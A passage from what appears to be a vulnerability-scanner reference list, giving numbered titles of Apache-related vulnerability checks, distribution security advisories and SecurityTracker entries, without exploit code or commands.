5446| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
5447| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
5448| [103122] Apache Web Server ETag Header Information Disclosure Weakness
5449| [103074] Apache Continuum Cross Site Scripting Vulnerability
5450| [103073] Apache Continuum Detection
5451| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
5452| [101023] Apache Open For Business Weak Password security check
5453| [101020] Apache Open For Business HTML injection vulnerability
5454| [101019] Apache Open For Business service detection
5455| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
5456| [100923] Apache Archiva Detection
5457| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
5458| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
5459| [100813] Apache Axis2 Detection
5460| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
5461| [100795] Apache Derby Detection
5462| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
5463| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
5464| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
5465| [100514] Apache Multiple Security Vulnerabilities
5466| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
5467| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
5468| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
5469| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
5470| [72626] Debian Security Advisory DSA 2579-1 (apache2)
5471| [72612] FreeBSD Ports: apache22
5472| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
5473| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
5474| [71512] FreeBSD Ports: apache
5475| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
5476| [71256] Debian Security Advisory DSA 2452-1 (apache2)
5477| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
5478| [70737] FreeBSD Ports: apache
5479| [70724] Debian Security Advisory DSA 2405-1 (apache2)
5480| [70600] FreeBSD Ports: apache
5481| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
5482| [70235] Debian Security Advisory DSA 2298-2 (apache2)
5483| [70233] Debian Security Advisory DSA 2298-1 (apache2)
5484| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
5485| [69338] Debian Security Advisory DSA 2202-1 (apache2)
5486| [67868] FreeBSD Ports: apache
5487| [66816] FreeBSD Ports: apache
5488| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
5489| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
5490| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
5491| [66081] SLES11: Security update for Apache 2
5492| [66074] SLES10: Security update for Apache 2
5493| [66070] SLES9: Security update for Apache 2
5494| [65998] SLES10: Security update for apache2-mod_python
5495| [65893] SLES10: Security update for Apache 2
5496| [65888] SLES10: Security update for Apache 2
5497| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
5498| [65510] SLES9: Security update for Apache 2
5499| [65472] SLES9: Security update for Apache
5500| [65467] SLES9: Security update for Apache
5501| [65450] SLES9: Security update for apache2
5502| [65390] SLES9: Security update for Apache2
5503| [65363] SLES9: Security update for Apache2
5504| [65309] SLES9: Security update for Apache and mod_ssl
5505| [65296] SLES9: Security update for webdav apache module
5506| [65283] SLES9: Security update for Apache2
5507| [65249] SLES9: Security update for Apache 2
5508| [65230] SLES9: Security update for Apache 2
5509| [65228] SLES9: Security update for Apache 2
5510| [65212] SLES9: Security update for apache2-mod_python
5511| [65209] SLES9: Security update for apache2-worker
5512| [65207] SLES9: Security update for Apache 2
5513| [65168] SLES9: Security update for apache2-mod_python
5514| [65142] SLES9: Security update for Apache2
5515| [65136] SLES9: Security update for Apache 2
5516| [65132] SLES9: Security update for apache
5517| [65131] SLES9: Security update for Apache 2 oes/CORE
5518| [65113] SLES9: Security update for apache2
5519| [65072] SLES9: Security update for apache and mod_ssl
5520| [65017] SLES9: Security update for Apache 2
5521| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
5522| [64783] FreeBSD Ports: apache
5523| [64774] Ubuntu USN-802-2 (apache2)
5524| [64653] Ubuntu USN-813-2 (apache2)
5525| [64559] Debian Security Advisory DSA 1834-2 (apache2)
5526| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
5527| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
5528| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
5529| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
5530| [64443] Ubuntu USN-802-1 (apache2)
5531| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
5532| [64423] Debian Security Advisory DSA 1834-1 (apache2)
5533| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
5534| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
5535| [64251] Debian Security Advisory DSA 1816-1 (apache2)
5536| [64201] Ubuntu USN-787-1 (apache2)
5537| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
5538| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
5539| [63565] FreeBSD Ports: apache
5540| [63562] Ubuntu USN-731-1 (apache2)
5541| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
5542| [61185] FreeBSD Ports: apache
5543| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
5544| [60387] Slackware Advisory SSA:2008-045-02 apache
5545| [58826] FreeBSD Ports: apache-tomcat
5546| [58825] FreeBSD Ports: apache-tomcat
5547| [58804] FreeBSD Ports: apache
5548| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
5549| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
5550| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
5551| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
5552| [57335] Debian Security Advisory DSA 1167-1 (apache)
5553| [57201] Debian Security Advisory DSA 1131-1 (apache)
5554| [57200] Debian Security Advisory DSA 1132-1 (apache2)
5555| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
5556| [57145] FreeBSD Ports: apache
5557| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
5558| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
5559| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
5560| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
5561| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
5562| [56067] FreeBSD Ports: apache
5563| [55803] Slackware Advisory SSA:2005-310-04 apache
5564| [55519] Debian Security Advisory DSA 839-1 (apachetop)
5565| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
5566| [55355] FreeBSD Ports: apache
5567| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
5568| [55261] Debian Security Advisory DSA 805-1 (apache2)
5569| [55259] Debian Security Advisory DSA 803-1 (apache)
5570| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
5571| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
5572| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
5573| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
5574| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
5575| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
5576| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
5577| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
5578| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
5579| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
5580| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
5581| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
5582| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
5583| [54439] FreeBSD Ports: apache
5584| [53931] Slackware Advisory SSA:2004-133-01 apache
5585| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
5586| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
5587| [53878] Slackware Advisory SSA:2003-308-01 apache security update
5588| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
5589| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
5590| [53848] Debian Security Advisory DSA 131-1 (apache)
5591| [53784] Debian Security Advisory DSA 021-1 (apache)
5592| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
5593| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
5594| [53735] Debian Security Advisory DSA 187-1 (apache)
5595| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
5596| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
5597| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
5598| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
5599| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
5600| [53282] Debian Security Advisory DSA 594-1 (apache)
5601| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
5602| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
5603| [53215] Debian Security Advisory DSA 525-1 (apache)
5604| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
5605| [52529] FreeBSD Ports: apache+ssl
5606| [52501] FreeBSD Ports: apache
5607| [52461] FreeBSD Ports: apache
5608| [52390] FreeBSD Ports: apache
5609| [52389] FreeBSD Ports: apache
5610| [52388] FreeBSD Ports: apache
5611| [52383] FreeBSD Ports: apache
5612| [52339] FreeBSD Ports: apache+mod_ssl
5613| [52331] FreeBSD Ports: apache
5614| [52329] FreeBSD Ports: ru-apache+mod_ssl
5615| [52314] FreeBSD Ports: apache
5616| [52310] FreeBSD Ports: apache
5617| [15588] Detect Apache HTTPS
5618| [15555] Apache mod_proxy content-length buffer overflow
5619| [15554] Apache mod_include priviledge escalation
5620| [14771] Apache <= 1.3.33 htpasswd local overflow
5621| [14177] Apache mod_access rule bypass
5622| [13644] Apache mod_rootme Backdoor
5623| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
5624| [12280] Apache Connection Blocking Denial of Service
5625| [12239] Apache Error Log Escape Sequence Injection
5626| [12123] Apache Tomcat source.jsp malformed request information disclosure
5627| [12085] Apache Tomcat servlet/JSP container default files
5628| [11438] Apache Tomcat Directory Listing and File disclosure
5629| [11204] Apache Tomcat Default Accounts
5630| [11092] Apache 2.0.39 Win32 directory traversal
5631| [11046] Apache Tomcat TroubleShooter Servlet Installed
5632| [11042] Apache Tomcat DOS Device Name XSS
5633| [11041] Apache Tomcat /servlet Cross Site Scripting
5634| [10938] Apache Remote Command Execution via .bat files
5635| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
5636| [10773] MacOS X Finder reveals contents of Apache Web files
5637| [10766] Apache UserDir Sensitive Information Disclosure
5638| [10756] MacOS X Finder reveals contents of Apache Web directories
5639| [10752] Apache Auth Module SQL Insertion Attack
5640| [10704] Apache Directory Listing
5641| [10678] Apache /server-info accessible
5642| [10677] Apache /server-status accessible
5643| [10440] Check for Apache Multiple / vulnerability
5644|
5645| SecurityTracker - https://www.securitytracker.com:
5646| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
5647| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
5648| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
5649| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
5650| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
5651| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
5652| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
5653| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
5654| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
5655| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
5656| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
5657| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
5658| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
5659| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
5660| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
5661| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
5662| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
5663| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
5664| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
5665| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
5666| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
5667| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
5668| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
5669| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
5670| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
5671| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
5672| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
5673| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
5674| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
5675| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
5676| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
5677| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
5678| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
5679| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
5680| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
5681| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
5682| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
5683| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
5684| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
5685| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
5686| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
5687| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
5688| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
5689| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
5690| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
5691| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
5692| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
5693| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
5694| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
5695| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
5696| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
5697| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
5698| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
5699| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
5700| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
5701| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
5702| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
5703| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
5704| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
5705| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
5706| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
5707| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
5708| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
5709| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
5710| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
5711| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
5712| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
5713| [1024096] Apache mod_proxy_http May Return Results for a Different Request
5714| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
5715| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
5716| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
5717| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
5718| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
5719| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
5720| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
5721| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
5722| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
5723| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
5724| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
5725| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
5726| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
5727| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
5728| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
5729| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
5730| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
5731| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
5732| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
5733| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
5734| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
5735| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
5736| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
5737| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
5738| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
5739| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
5740| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
5741| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
5742| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
5743| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
5744| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
5745| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
5746| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
5747| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
5748| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
5749| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
5750| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
5751| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
5752| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
5753| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
5754| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
5755| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
5756| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
5757| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
5758| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
5759| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
5760| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
5761| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
5762| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
5763| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
5764| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
5765| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
5766| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
5767| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
5768| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
5769| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
5770| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
5771| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
5772| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
5773| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
5774| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
5775| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
5776| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
5777| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
5778| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
5779| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
5780| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
5781| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
5782| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
5783| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
5784| [1008920] Apache mod_digest May Validate Replayed Client Responses
5785| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
5786| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
5787| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
5788| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
5789| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
5790| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
5791| [1008030] Apache mod_rewrite Contains a Buffer Overflow
5792| [1008029] Apache mod_alias Contains a Buffer Overflow
5793| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
5794| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
5795| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
5796| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
5797| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
5798| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
5799| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
5800| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
5801| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
5802| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
5803| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
5804| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
5805| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
5806| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
5807| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
5808| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
5809| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
5810| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
5811| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
5812| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
5813| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
5814| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
5815| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
5816| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
5817| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
5818| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
5819| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
5820| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
5821| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
5822| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
5823| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
5824| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
5825| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
5826| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
5827| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
5828| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
5829| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
5830| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
5831| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
5832| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
5833| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
5834| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
5835| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
5836| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
5837| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
5838| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
5839| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
5840| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
5841| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
5842| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
